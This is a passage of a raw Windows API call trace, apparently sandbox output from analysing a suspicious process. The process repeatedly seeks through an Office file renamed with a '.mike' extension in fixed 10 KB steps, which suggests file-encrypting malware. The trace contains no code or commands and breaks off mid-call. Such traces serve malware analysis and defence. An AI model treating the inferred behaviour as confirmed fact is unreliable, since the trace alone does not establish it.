[0051.892] SetFilePointer (in: hFile=0x284, lDistanceToMove=81920, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x14000 [0051.892] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0051.892] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.892] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.893] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.893] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.893] SetFilePointer (in: hFile=0x284, lDistanceToMove=92160, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x16800 [0051.893] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0051.894] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.894] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.894] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.894] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.894] SetFilePointer (in: hFile=0x284, lDistanceToMove=102400, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x19000 [0051.895] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0051.895] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.895] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.895] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.895] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.895] SetFilePointer (in: hFile=0x284, lDistanceToMove=112640, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x1b800 [0051.896] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0051.896] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.896] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.896] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.896] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.897] SetFilePointer (in: hFile=0x284, lDistanceToMove=122880, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x1e000 [0051.898] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0051.898] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.898] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.898] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.898] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.898] SetFilePointer (in: hFile=0x284, lDistanceToMove=133120, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x20800 [0051.900] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0051.900] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.900] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.900] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.900] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.900] SetFilePointer (in: hFile=0x284, lDistanceToMove=143360, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x23000 [0051.912] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0051.912] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.912] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.913] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.913] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.913] SetFilePointer (in: hFile=0x288, lDistanceToMove=153600, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x25800 [0051.914] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0051.914] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.914] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.914] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.914] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.915] SetFilePointer (in: hFile=0x288, lDistanceToMove=163840, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x28000 [0051.916] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0051.916] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.916] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.916] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.916] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.916] SetFilePointer (in: hFile=0x288, lDistanceToMove=174080, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2a800 [0051.917] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0051.917] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.918] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.918] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.918] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.918] SetFilePointer (in: hFile=0x288, lDistanceToMove=184320, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2d000 [0051.919] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0051.919] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.919] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.920] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.920] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.920] SetFilePointer (in: hFile=0x288, lDistanceToMove=194560, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2f800 [0051.921] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0051.921] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.921] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.921] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.922] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.922] SetFilePointer (in: hFile=0x288, lDistanceToMove=204800, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x32000 [0051.923] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0051.923] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.923] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.923] SetFilePointer (in: hFile=0x288, lDistanceToMove=215040, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x34800 [0051.924] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0051.924] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.925] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.925] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.925] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.925] SetFilePointer (in: hFile=0x288, lDistanceToMove=225280, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x37000 [0051.926] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0051.926] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.926] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.927] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.927] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.927] SetFilePointer (in: hFile=0x288, lDistanceToMove=235520, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x39800 [0051.928] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0051.928] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.928] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.928] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.929] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.929] SetFilePointer (in: hFile=0x288, lDistanceToMove=245760, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x3c000 [0051.930] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0051.930] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.930] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.930] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.930] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.930] SetFilePointer (in: hFile=0x288, lDistanceToMove=256000, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x3e800 [0051.932] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0051.932] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.932] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.933] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.933] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.933] SetFilePointer (in: hFile=0x288, lDistanceToMove=266240, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x41000 [0051.934] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0051.934] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.935] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.935] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.935] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.935] SetFilePointer (in: hFile=0x288, lDistanceToMove=276480, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x43800 [0051.936] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0051.936] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.936] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.937] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.937] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.937] SetFilePointer (in: hFile=0x288, lDistanceToMove=286720, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x46000 [0051.938] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0051.938] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.938] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.938] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.938] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.938] SetFilePointer (in: hFile=0x288, lDistanceToMove=296960, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x48800 [0051.941] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0051.941] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.941] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.942] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.942] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.942] SetFilePointer (in: hFile=0x288, lDistanceToMove=307200, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x4b000 [0051.943] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0051.943] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.943] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.943] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.944] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.944] SetFilePointer (in: hFile=0x288, lDistanceToMove=317440, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x4d800 [0051.945] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0051.945] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.945] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.945] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.945] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.945] SetFilePointer (in: hFile=0x288, lDistanceToMove=327680, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x50000 [0051.946] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0051.947] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.947] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.947] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.947] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.947] SetFilePointer (in: hFile=0x288, lDistanceToMove=337920, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x52800 [0051.948] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0051.948] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.948] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.949] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.949] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.949] SetFilePointer (in: hFile=0x288, lDistanceToMove=348160, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x55000 [0051.950] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0051.950] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.950] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.950] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.951] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.951] SetFilePointer (in: hFile=0x288, lDistanceToMove=358400, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x57800 [0051.952] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0051.952] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.952] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.952] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.952] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.952] SetFilePointer (in: hFile=0x288, lDistanceToMove=368640, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x5a000 [0051.954] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0051.954] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.954] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.954] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.954] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.954] SetFilePointer (in: hFile=0x288, lDistanceToMove=378880, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x5c800 [0051.955] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0051.955] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.955] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.956] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.956] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.956] SetFilePointer (in: hFile=0x288, lDistanceToMove=389120, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x5f000 [0051.957] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, 